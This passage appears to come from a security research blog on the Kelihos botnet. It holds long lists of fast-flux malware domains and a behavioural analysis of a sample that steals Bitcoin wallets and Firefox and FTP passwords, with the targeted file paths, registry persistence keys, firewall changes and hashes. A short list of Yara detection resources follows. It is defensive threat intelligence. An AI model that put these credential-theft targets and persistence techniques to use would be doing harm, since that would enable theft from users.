ojuxxub.ru
okrolyk.ru
onsenyq.ru
pidohis.ru
qiohxuv.ru
qoqwoas.ru
raleqle.ru
ripexru.ru
salyqiz.ru
sidinox.ru
suvmune.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
zuhycyc.ru

ns[1-6].frostli.com
acypruq.eu
ahvorme.eu
akdygij.eu
amjymqe.eu
anuvjiw.eu
arcelje.eu
atnywyz.eu
awwapxe.eu
axcinov.eu
behhayq.eu
bekqyma.eu
betalpo.eu
biysqix.eu
bopihwi.eu
bosoxut.eu
bozopit.eu
buzgomu.eu
cetafyb.eu
cezsyox.eu
ciapkox.eu
cirafir.eu
civadke.eu
cocyxmi.eu
cohmouz.eu
cylxaob.eu
dafodup.eu
dilecdo.eu
dimulew.eu
doiqdag.eu
dosysvi.eu
dyofjog.eu
dysfyed.eu
edkadaf.eu
efewfyr.eu
ejywqem.eu
eqvyvej.eu
erlomaj.eu
essessa.eu
esycwyf.eu
etrodhy.eu
evpytej.eu
ezadkam.eu
favorib.eu
favyjxu.eu
fepyjeb.eu
finvami.eu
fivolid.eu
fudyvis.eu
gahemqy.eu
gatocut.eu
gehgoaz.eu
gijaqqo.eu
gipahco.eu
gixseka.eu
gobyvfa.eu
godeffo.eu
goemqag.eu
gorgyli.eu
gycakus.eu
gywafdo.eu
hatahse.eu
havimpa.eu
hiahnuh.eu
hiurmuc.eu
hometxa.eu
huenhaz.eu
ibceqyz.eu
iboqfuk.eu
idbizex.eu
igfowma.eu
ihhosti.eu
ihozvab.eu
ijnihud.eu
isdogon.eu
issolme.eu
iwackim.eu
japonzo.eu
jiaftem.eu
jibagoh.eu
jibyxre.eu
jimikej.eu
jyqilge.eu
kaloliw.eu
kasytpu.eu
koqasiq.eu
kubawvu.eu
kufogku.eu
kuletif.eu
kytyvod.eu
lakedin.eu
laxnelo.eu
lelreyb.eu
lepitmi.eu
leqetso.eu
lewujix.eu
libcauf.eu
luhychu.eu
luxypuj.eu
lywaqvu.eu
macetty.eu
maficyn.eu
miqyhce.eu
monedyg.eu
mozegys.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nogomiq.eu
nugtile.eu
nuvyhne.eu
nyrylla.eu
ocbogwy.eu
ocgejim.eu
ofxawmi.eu
ogkozew.eu
okmazax.eu
ontabmy.eu
osfylqu.eu
oshefiz.eu
ovvuceq.eu
owxawic.eu
oxkyrir.eu
ozaljek.eu
paqmery.eu
pexigki.eu
poihpuh.eu
povokim.eu
pybxaur.eu
qawajky.eu
qazkaxy.eu
qofabar.eu
quxafif.eu
quzsevy.eu
qyhumet.eu
qyycdyh.eu
retarip.eu
roijtil.eu
rubhiup.eu
runuhax.eu
ruvbaiv.eu
rybunwa.eu
ryflyed.eu
rylliny.eu
saercet.eu
seenruz.eu
seybdec.eu
socriaj.eu
somavko.eu
suzzaav.eu
syfetap.eu
symapmy.eu
tivuzga.eu
tunmayz.eu
tuopbel.eu
udquget.eu
udsopof.eu
ugjypnu.eu
uhdijgi.eu
ujgitip.eu
ukxames.eu
unvevvi.eu
upyqpiz.eu
ussypoc.eu
uswohyl.eu
uxjatqo.eu
vadjani.eu
venuqdy.eu
vepucyk.eu
vizocny.eu
wabomiw.eu
wyylsic.eu
xagublo.eu
xeyhzyc.eu
xijawpa.eu
xumitza.eu
ybocqug.eu
ycpasjy.eu
yhivdob.eu
yhvotyf.eu
yjygtux.eu
ypvipja.eu
ypychuj.eu
yrhodyf.eu
ysfukiw.eu
yvadmap.eu
yvsuxel.eu
zakasoc.eu
zawfyev.eu
zequspu.eu
zexdaga.eu
ziqnypa.eu
zobubof.eu
zogaguj.eu
zoneczu.eu
zuzzuna.eu
zydnimy.eu
zyefhim.eu
zymidaf.eu
zyvacus.eu
frostli.com

ns[1-6].pizzebu.com
awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu
agomdaz.eu
ahmomyx.eu
ahvorme.eu
akdygij.eu
axcinov.eu
bemewan.eu
buzgomu.eu
cikynon.eu
cirafir.eu
ciskuur.eu
cureses.eu
ezadkam.eu
fagahmo.eu
gatocut.eu
gawgulo.eu
gixseka.eu
goemqag.eu
gyhello.eu
hatahse.eu
havimpa.eu
hometxa.eu
idbizex.eu
ileqbew.eu
imarnim.eu
japonzo.eu
jobfyre.eu
kuarzoz.eu
kuletif.eu
kytyvod.eu
lelreyb.eu
lomqybi.eu
lubigne.eu
macetty.eu
mosidgu.eu
movjihi.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nuvyhne.eu
nuzozuf.eu
ofxawmi.eu
opybxyb.eu
owlyzgi.eu
pefzota.eu
pexigki.eu
qoanxat.eu
qonerne.eu
roqeluv.eu
rylliny.eu
taksusy.eu
tugatiq.eu
udzonek.eu
uffecuj.eu
ugsowqy.eu
uhxesap.eu
ukryxyw.eu
wigiluk.eu
xumitza.eu
xuygcut.eu
xyrpavu.eu
ydbeqes.eu
yfuqcon.eu
yfynqav.eu
yjygtux.eu
yklocgu.eu
ynpysul.eu
yrhodyf.eu
ysfukiw.eu
zanpohe.eu
zyvacus.eu

awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu

pizzebu.com.
agomdaz.eu
ahmomyx.eu
ahvorme.eu
akdygij.eu
axcinov.eu
bemewan.eu
buzgomu.eu
cikynon.eu
cirafir.eu
ciskuur.eu
cureses.eu
ezadkam.eu
fagahmo.eu
gatocut.eu
gawgulo.eu
gixseka.eu
goemqag.eu
gyhello.eu
hatahse.eu
havimpa.eu
hometxa.eu
idbizex.eu
ileqbew.eu
imarnim.eu
japonzo.eu
jobfyre.eu
kuarzoz.eu
kuletif.eu
kytyvod.eu
lelreyb.eu
lomqybi.eu
lubigne.eu
macetty.eu
mosidgu.eu
movjihi.eu
mufidis.eu
nagegal.eu
nexreza.eu
noalbej.eu
nuvyhne.eu
nuzozuf.eu
ofxawmi.eu
opybxyb.eu
owlyzgi.eu
pefzota.eu
pexigki.eu
qoanxat.eu
qonerne.eu
roqeluv.eu
rylliny.eu
taksusy.eu
tugatiq.eu
udzonek.eu
uffecuj.eu
ugsowqy.eu
uhxesap.eu
ukryxyw.eu
wigiluk.eu
xumitza.eu
xuygcut.eu
xyrpavu.eu
ydbeqes.eu
yfuqcon.eu
yfynqav.eu
yjygtux.eu
yklocgu.eu
ynpysul.eu
yrhodyf.eu
ysfukiw.eu
zanpohe.eu
zyvacus.eu

ns[1-6]diastr.com
affuxok.ru
aglycyx.ru
agogsip.ru
ahodxil.ru
ajgufog.ru
aqcanov.ru
avondov.ru
axrohug.ru
baryqyq.ru
bixqijy.ru
bogquse.ru
borutat.ru
butawad.ru
bylviha.ru
cajuhwo.ru
cesisnu.ru
cibudit.ru
coukdyg.ru
cuhugoh.ru
cyuhtut.ru
daagtah.ru
deivwyx.ru
duebgud.ru
efdylve.ru
ehgycuj.ru
eqlasho.ru
exmotof.ru
ezirhaz.ru
fenataj.ru
fyvegom.ru
giczeca.ru
heupjeq.ru
hidafog.ru
hivagdy.ru
houktuh.ru
hugejin.ru
hyjamat.ru
iddyraq.ru
ihfajoc.ru
ixqasib.ru
jyernol.ru
kabezer.ru
kipokfy.ru
koqqeih.ru
kufdeag.ru
kulegoh.ru
kyqolby.ru
lauqpum.ru
lojseuv.ru
lojyzyt.ru
loxusyd.ru
magucjo.ru
melimma.ru
miobrav.ru
mubidpy.ru
nebirza.ru
nilwoim.ru
nimepof.ru
nougxin.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
pesudwa.ru
pidohis.ru
pokatik.ru
pubujux.ru
qiohxuv.ru
qoqwoas.ru
qoripwe.ru
quhokle.ru
raleqle.ru
ripexru.ru
rodejuj.ru
rymyheh.ru
sidinox.ru
suvmune.ru
teuxtik.ru
tevythi.ru
titepob.ru
tobjuow.ru
togpuit.ru
tonalog.ru
tozukem.ru
tyhrypo.ru
ubbylys.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
wexriyp.ru
wiewkux.ru
wyliwow.ru
xakruaq.ru
xekisuw.ru
xequjej.ru
xuzuppu.ru
xybired.ru
ygdykin.ru
ykrijyj.ru
ypemval.ru
ypyxwon.ru
yqdazyb.ru
yvnahty.ru
zaacvas.ru
zeryqiq.ru
zihemmi.ru
zuzilum.ru

ns[1-6]snapoli.com
affuxok.ru
ajgufog.ru
bogquse.ru
deivwyx.ru
duebgud.ru
exmotof.ru
ezirhaz.ru
giczeca.ru
houktuh.ru
ihfajoc.ru
jazzute.ru
kabezer.ru
kipokfy.ru
nilwoim.ru
ojuxxub.ru
okrolyk.ru
onsenyq.ru
qiohxuv.ru
qoqwoas.ru
raleqle.ru
ripexru.ru
salyqiz.ru
sidinox.ru
suvmune.ru
tobjuow.ru
tyhrypo.ru
veoxzul.ru
vysatyv.ru
wegipij.ru
xuzuppu.ru
ypemval.ru
yqdazyb.ru
yvnahty.ru
zuhycyc.ru
snapoli.com

ns[1-6].firstara.com
alnykwu.in
anhozur.in
avutguz.in
azgesaj.in
bagexev.in
bemdymu.in
beruhor.in
bydxufu.in
cutrouc.in
docxymo.in
dyemheb.in
dysjeag.in
edsahug.in
egziwof.in
ejredeg.in
eptulyk.in
esqific.in
ewnupaj.in
fybildo.in
geigbeq.in
goivgek.in
gorocez.in
havowyx.in
haywsab.in
hexdoik.in
hezypez.in
hirurgy.in
honedju.in
hotfool.in
huisfeq.in
huvygmy.in
icotkik.in
iczipyk.in
iddeste.in
igtevax.in
iksutel.in
infobyt.in
itkyguh.in
ivhapuf.in
jepokfa.in
jiifxoz.in
jiquvel.in
juzuxcy.in
kaduqec.in
kiabrok.in
kufirqe.in
kyrocok.in
legycxa.in
leqozdy.in
lexucyl.in
moropdy.in
mutywro.in
myzxozy.in
negmeuw.in
nytutiv.in
ofusqar.in
oqufnyg.in
oxetpah.in
pamywuz.in
pedezby.in
pisyhyn.in
pydilaw.in
qabojir.in
qifufuk.in
raehxez.in
riwgagi.in
rufabex.in
seazdel.in
seompis.in
sinuheh.in
talutyw.in
tarraso.in
tivenyr.in
ucfensa.in
ufbofky.in
ufhewuk.in
ujjukag.in
uqtopik.in
urxiwat.in
uwhepij.in
veqyhli.in
vezkoty.in
vugozan.in
vuqfuek.in
wasidxo.in
wynzobo.in
wyvloiq.in
xategon.in
xevezby.in
xutepyj.in
xuwigir.in
yxfibet.in
yzrefyf.in
zaxseyz.in
zilziom.in
zohdoud.in
zunipaw.in
zynacha.in
firstara.com

roblect.com
akzruyh.ce.ms
apeefoacx.ce.ms
ezoglolbj.ce.ms
gcbjbamdj.ce.ms
geljoxlkd.ce.ms
himukcnen.ce.ms
hyyviccku.ce.ms
imoqjzsej.ce.ms
ljltpaffv.ce.ms
lrjvgjwmg.ce.ms
lvfksyqmz.ce.ms
mhfrhelfr.ce.ms
mkiplkooq.ce.ms
nlozaydyk.ce.ms
ouxwexphh.ce.ms
rxhndcxxi.ce.ms
shuxkzjvp.ce.ms
dlmdlemqjw.ce.ms
roblect.com

galloma.com
ajyxxun.ce.ms
avtjicn.ce.ms
bbzulty.ce.ms
bhueizz.ce.ms
bmxnbbz.ce.ms
bzzqkjk.ce.ms
cluuocw.ce.ms
cqkjibj.ce.ms
dixrkno.ce.ms
dkwhwqc.ce.ms
eymosvc.ce.ms
ezwrvsq.ce.ms
fautuzh.ce.ms
fbxmkgs.ce.ms
gnrmdds.ce.ms
hvhlazq.ce.ms
iygxhfq.ce.ms
jddpvzw.ce.ms
jejmqny.ce.ms
jlruxuf.ce.ms
jqqvqnv.ce.ms
jvhqpyj.ce.ms
ldntbtg.ce.ms
lkddqig.ce.ms
miulvnp.ce.ms
neitfvf.ce.ms
norwdyd.ce.ms
obsnkwx.ce.ms
oqylgfb.ce.ms
pyxthzm.ce.ms
qbdptev.ce.ms
rkzdnlm.ce.ms
rrfrahh.ce.ms
saogsek.ce.ms
sqwdoei.ce.ms
tazaopm.ce.ms
tyldrgy.ce.ms
ujbtapn.ce.ms
uvqyfnd.ce.ms
vwtnddd.ce.ms
wfbanyv.ce.ms
wukiuxb.ce.ms
wxatkfz.ce.ms
xalagnq.ce.ms
yvfeyyn.ce.ms
zhmeqqs.ce.ms
aadsfqle.ce.ms
aahoqmie.ce.ms
adokxrbx.ce.ms
adpiisyi.ce.ms
azyvxiqw.ce.ms
bwwrudue.ce.ms
ccybfonk.ce.ms
dlylxoca.ce.ms
dplvoghe.ce.ms
egezeqki.ce.ms
fjjlnqdt.ce.ms
flgsajeb.ce.ms
fonpxxvd.ce.ms
gwlgkror.ce.ms
gwtowtjz.ce.ms
hezfpxvr.ce.ms
iesathjc.ce.ms
iigijrqo.ce.ms
ijcyicbj.ce.ms
iupyrwes.ce.ms
kzomxpkx.ce.ms
ltaqntzd.ce.ms
ltjohroy.ce.ms
mhivnltw.ce.ms
nanxawdp.ce.ms
nhdoyayw.ce.ms
nktxmecg.ce.ms
nucmqeml.ce.ms
ogmoupcf.ce.ms
pdmhojaf.ce.ms
phlmdkkg.ce.ms
ptufrgou.ce.ms
pwhwhatr.ce.ms
qgewkpxr.ce.ms
raqdiqwr.ce.ms
reoawbqz.ce.ms
sigafisv.ce.ms
spdyccmi.ce.ms
srqdtssc.ce.ms
tfxjtthw.ce.ms
tlzfdnjv.ce.ms
twszglot.ce.ms
ulpgjmhh.ce.ms
vcrlyfcm.ce.ms
viamftgu.ce.ms
vinlgixi.ce.ms
vlyhbwqp.ce.ms
vvmqwzjd.ce.ms
wanolzyh.ce.ms
wcvlwcqz.ce.ms
wocsgoku.ce.ms
wrtetrxh.ce.ms
xacnagya.ce.ms
xbpfgoob.ce.ms
xyzrriwp.ce.ms
yclrslbn.ce.ms
yfonzetf.ce.ms
zdzmkdll.ce.ms
znfxgwwr.ce.ms
aanhryihh.ce.ms
amwthlqru.ce.ms
axikehkes.ce.ms
axrgpgnay.ce.ms
bqtvpxibn.ce.ms
bsaqfqzof.ce.ms
bugtjtgwx.ce.ms
cmuvcunas.ce.ms
cqszgtvxd.ce.ms
cwpdeuvmo.ce.ms
desajkhtt.ce.ms
dgxdydvqu.ce.ms
dhmykycap.ce.ms
djgkxulbq.ce.ms
dldbiwlib.ce.ms
dmmwbnmba.ce.ms
ebeecytff.ce.ms
eehxpgnfa.ce.ms
elvliioxz.ce.ms
ewqvmeirc.ce.ms
festcfwmb.ce.ms
fnmqkvqhc.ce.ms
fnwqxoaqd.ce.ms
gjfqabqzs.ce.ms
gkqssznth.ce.ms
glfvlbsqy.ce.ms
godlblffu.ce.ms
gxvkuefqy.ce.ms
gzwynxrdz.ce.ms
hagduqcbi.ce.ms
hbddtiimz.ce.ms
hjutzoytz.ce.ms
hpuurfkft.ce.ms
hrrdabsgc.ce.ms
hvcsfnnbl.ce.ms
hxnvbogua.ce.ms
ibhmbiujp.ce.ms
ibnrnrsca.ce.ms
ihtxwgrri.ce.ms
ikbpsegqa.ce.ms
imozsewyo.ce.ms
inyqjraby.ce.ms
iqwkvaleh.ce.ms
iqxflmwpo.ce.ms
ivejampkn.ce.ms
jhzzwrnnv.ce.ms
jkmxhwjzd.ce.ms
jmjnguloo.ce.ms
jovrpwfks.ce.ms
jrctenbni.ce.ms
khnzohexi.ce.ms
klkzahmar.ce.ms
kogqvmbyl.ce.ms
ldgtxgznq.ce.ms
ldzjcvqai.ce.ms
liowklchs.ce.ms
lqvncgwsu.ce.ms
mffhjjuyo.ce.ms
mhiyegpwm.ce.ms
mpnfrtxkb.ce.ms
mxzhmcyus.ce.ms
nbgatlklr.ce.ms
ncqpfwapp.ce.ms
nrsxuxxjk.ce.ms
nzaqohego.ce.ms
ofzdzqhgs.ce.ms
oknstngdx.ce.ms
ooiebkatd.ce.ms
oowkipkpf.ce.ms
ortshbpzv.ce.ms
oueaegkkt.ce.ms
owhhnjtvt.ce.ms
pbxyhsjcl.ce.ms
phttlfxnv.ce.ms
pnsohrgpm.ce.ms
pqqhqklih.ce.ms
qngclqeln.ce.ms
qxztybniy.ce.ms
rdmhzrzab.ce.ms
rllwnboym.ce.ms
rvbkzpsls.ce.ms
rypwddplv.ce.ms
rytfgngkw.ce.ms
sbealjyie.ce.ms
sbryweuao.ce.ms
sdgokmpmp.ce.ms
sfkgvnqll.ce.ms
shhgcqijh.ce.ms
shkrbmwiq.ce.ms
sikoastac.ce.ms
soabvshxw.ce.ms
srcfkmvtz.ce.ms
sstmzbmvc.ce.ms
szdigkjog.ce.ms
thchbcfsr.ce.ms
thxvwlnst.ce.ms
udprbpncg.ce.ms
uiniyiwze.ce.ms
upsbjrgpy.ce.ms
upthfdgon.ce.ms
uuybeevvw.ce.ms
vexojepsn.ce.ms
vojehftlt.ce.ms
vwhbcowxu.ce.ms
vwvabbujm.ce.ms
wodutsrzu.ce.ms
wyfhzlmkw.ce.ms
wzyxueqhy.ce.ms
xbaxsnihc.ce.ms
ygmehzjlg.ce.ms
yorzhrizg.ce.ms
ypflxjlzo.ce.ms
zlkaimpeq.ce.ms
ztngnmmib.ce.ms
zxtvqkftz.ce.ms
aknmlvkeho.ce.ms
apiuxcoauy.ce.ms
buygunnsnw.ce.ms
cblfdefxmf.ce.ms
cmbwsssnlo.ce.ms
cwoomqxtjo.ce.ms
dohnebpdrp.ce.ms
dyioatrhnx.ce.ms
eqqtdwbnwg.ce.ms
eyeamccxvb.ce.ms
hlmewfctuc.ce.ms
iqqspkqdji.ce.ms
jjyzwvufmb.ce.ms
jsgecgfnrw.ce.ms
kvmchjinmu.ce.ms
lglqkkqybq.ce.ms
lqsyddcoot.ce.ms
lvscrnzqzm.ce.ms
mgxstzpxfv.ce.ms
nflmyecafv.ce.ms
nmwhryeybz.ce.ms
noilnvnsie.ce.ms
nuyzxhxyqn.ce.ms
oixtvfudyd.ce.ms
pnfyoidgkn.ce.ms
pnsntpjnhw.ce.ms
pvfnpwoyjq.ce.ms
pxafmmglnp.ce.ms
qdmxpqpkbk.ce.ms
razocjpywj.ce.ms
rcmtvlzbuk.ce.ms
rljgnvkghq.ce.ms
rlybfffajb.ce.ms
rybrueryce.ce.ms
sokhxokonz.ce.ms
spuiygpbcr.ce.ms
sweaxoedyw.ce.ms
sygsgahycs.ce.ms
tepbzktaqg.ce.ms
uupkufucmx.ce.ms
vcoewypubi.ce.ms
xerrwvuuzb.ce.ms
xhmqllyufj.ce.ms
xmfydbnjgq.ce.ms
ydokioxqpc.ce.ms
yefwipbiih.ce.ms
ysjeguxpmt.ce.ms

These are lists of IPs that ns1.boomsco.com (created 2013-01-13) and ns1.larstor.com (created 2012-12-22) were pointing to since their creation. The lists show how fast the ips change - more than 9,000 times over 30-45 days. There are many infected hosts but it does not mean that every host in the list was infected. Some IPs only were used for a second, which also demonstrates the evasive nature of the fast flux.
http://files.deependresearch.org/logs/boomsco_asn.txt
http://files.deependresearch.org/logs/larstor_asn.txt

Malware functionality and system changes.
Based on 0C921935F0880B5C2161B3905F8A3069 - active fresh sample, first seen by Virus 2013-02-06, PE date stamp 2011-30-10.

We also analyzed fresh samples with 2013 PE date stamps and observed same / similar functionality (some lack some features like Firefox or FTP password stealing or while others have the full set). Compared to Dec. 2012 post by abuse.ch, the overall functionality did not change much.

Functionality:

Installs winpcap and monitors traffic
Keylogging capabilities

see SetWindowsHookExW - in KERNEL32.dll imports

Steals Bitcoin wallet data (read more here https://en.bitcoin.it/wiki/Securing_your_wallet)

C:\Documents and Settings\\Application Data\Bitcoin\wallet.dat

Parses Firefox's Password Manager Local Database in order to steal stored passwords: Firefox stores password data in two files: key3.db (Master Password / Encryption key) and a 'signons' file (encrypted names and passwords). Reads:

--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite
--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite
--%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db
--%USERPROFILE%\[username]\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db

See SQL related imports in ODBCJT32.dll

SQLGetCursorNameW
SQLFreeStmt
SQLGetConnectAttrW
ConfigDialogProc
SQLSetCursorNameW
SQLSetStmtAttrW
SQLFreeConnect
SQLCloseCursor
DefTxtFmtDlgProc
SQLSetConnectAttrW
SQLColumnsW
SQLDisconnect
SQLDriverConnectW
SQLTablesW
SQLGetDiagFieldW
SQLBulkOperations
SQLSetPos
SQLFreeHandle
SQLSetDescFieldW
SQLNumResultCols
SQLConnectW
SQLExecute
SQLProcedureColumnsW
SQLFetch

Sends spam

iMimeMessageTree api calls: iMimeMessageTree parses and creates Internet messages. IMimeMessageTree treats a message as a tree of bodies where each body has a header and associated content. It gives a client the most flexible, low-level access to a message. Read more MimeMessageTree Interface http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx

imports from INETCOMM.dll

MimeOleSMimeCapAddCert
MimeEditIsSafeToRun
MimeOleUnEscapeStringInPlace
EssSignCertificateDecodeEx
etc.

As described previously, steals saved passwords from these FTP applications
(http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt). You can easily see these in memory ram dumps.

User Agents used (hardcoded in binaries), you can see in memory dumps or after unpacking

Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre
Mozilla/5.0 (X11; U; Linux x86_64; cy; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3
Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6 ; nl; rv:1.9) Gecko/2008051206 Firefox/3.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-AR; rv:1.9) Gecko/2008051206 Firefox/3.0
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-HK; rv:1.8.1.7) Gecko Firefox/2.0
Mozilla/5.0 (Windows; U; Win95; it; rv:1.8.1) Gecko/20061010 Firefox/2.0
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Mozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Mozilla/5.0 (X11; I; SunOS sun4u; en-GB; rv:1.7.8) Gecko/20050713 Firefox/1.0.4
Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041222 Firefox/1.0 (Debian package 1.0-4)
Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20041103 Firefox/0.9.3
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; Tablet PC 2.0; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MS-RTC LM 8; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.21022)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)
Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
Mozilla/2.0 (compatible; MSIE 3.0; Windows 3.1)
Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)
Microsoft Internet Explorer/1.0 (Windows 95)

System Changes

Sets to load when Windows is started

MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Changes Internet Explorer's default home page

HKU\S-1-5-21-1715567821-1275210071-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\UserPlayedActive: "DIhnDzXVnPDA+DO4Z72Q5BeL4OTOAPYBa9ef262UWrJ7soV07MpOXsWicda8NBA0tg=="

Makes Windows firewall changes:

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:Promo"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\53:UDP: "53:UDP:*:Enabled:Promo"

Service created SERVICES\NPF (winpcap service) WinPcap Packet Driver (NPF)

The original copied to

C:\WINDOWS\Temp\temp18.exe
C:\WINDOWS\Temp\kb778817.exe -- deleted
C:\WINDOWS\Temp\tmp.exe -- deleted

Virustotal results of 0c921935f0880b5c2161b3905f8a3069

SHA256:55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740
SHA1:05ca64ccfa582e7787d0238f82336a079aba8419
MD5:0c921935f0880b5c2161b3905f8a3069
File size:62.5 KB ( 64036 bytes )
File type:Win32 EXE
Tags:peexe
Detection ratio:23 / 46
Analysis date: 2013-02-06 20:08:42 UTC ( 4 days, 2 hours ago )
AgnitumTrojan.PWS.Tepfer!CPwnyKhdTDg20130206
AhnLab-V3Downloader/Win32.Agent20130206
AntiVirTR/Crypt.XPACK.Gen220130206
AvastWin32:Dropper-gen [Drp]20130206
AVGWin32/Cryptor20130206
BitDefenderGen:Variant.Kazy.13774220130206
ComodoTrojWare.Win32.Kryptik.ASEW20130206
DrWebTrojan.DownLoader6.38020130206
ESET-NOD32a variant of Win32/Kryptik.ASFO20130206
F-SecureGen:Variant.Kazy.13774220130206
FortinetW32/Kryptik.XUW!tr20130206
GDataGen:Variant.Kazy.13774220130206
IkarusTrojan-PWS.Win32.Tepfer20130206
KasperskyTrojan-PSW.Win32.Tepfer.emee20130206
KingsoftWin32.Troj.Generic.a.(kcloud)20130204
McAfeeArtemis!0C921935F08820130206
McAfee-GW-EditionArtemis!0C921935F08820130206
MicroWorld-eScanGen:Variant.Kazy.13774220130206
NANO-AntivirusTrojan.Win32.Kryptik.bevkem20130206
NormanKelihos.DA20130206
PandaSuspicious file20130206
VBA32SScope.Trojan.SB.0172220130206
VIPRETrojan.Win32.Generic!BT20130206

↧

Yara Resources

February 25, 2013, 2:44 pm

≫ Next: Under this rock... Vulnerable Wordpress/Joomla sites...

≪ Previous: Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update

Yara Project by Víctor Manuel Álvarez

Yara Exchange Google Group - exchange yara signatures, tools, resources, and ideas. 170+ members as of Feb.2013

Notable Yara related publications by date:

2013-08 http://yaragenerator.com/ YaraGenerator is an open-source toolset which allows for quick, effective, and automatic YARA signature creation from a number of malicious filetypesi (Executables, Office, PDF, Java, HTML, and more)
2013-02 MASTIFF with Yara Plugin by Klayton Monroe and Tyler Hudak. MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats.
2013-02 Using Cuckoobox, Yara, Volatility and Hopper Disassembler to analyze APT1 malware by Chort Z. Row
2012-01 Installing Latest Yara That Works With Automake-1.11 (Yara v1.7) by Chort
2013-01 Yara – Rule-based malware detection and analysis by Dejan Lukan
2013-01 Yaraprocessor by Stephen DiCato -MITRE Yaraprocessor allows you to scan data streams in few unique ways. It supports scanning data streams in discrete chunks, or buffers.
2013-01 ChopShop ChopShop is a MITRE developed framework to aid analysts in the creation and execution of pynids based decoders and detectors of APT tradecraft.
2013-02 Working with Yara. Security Flux
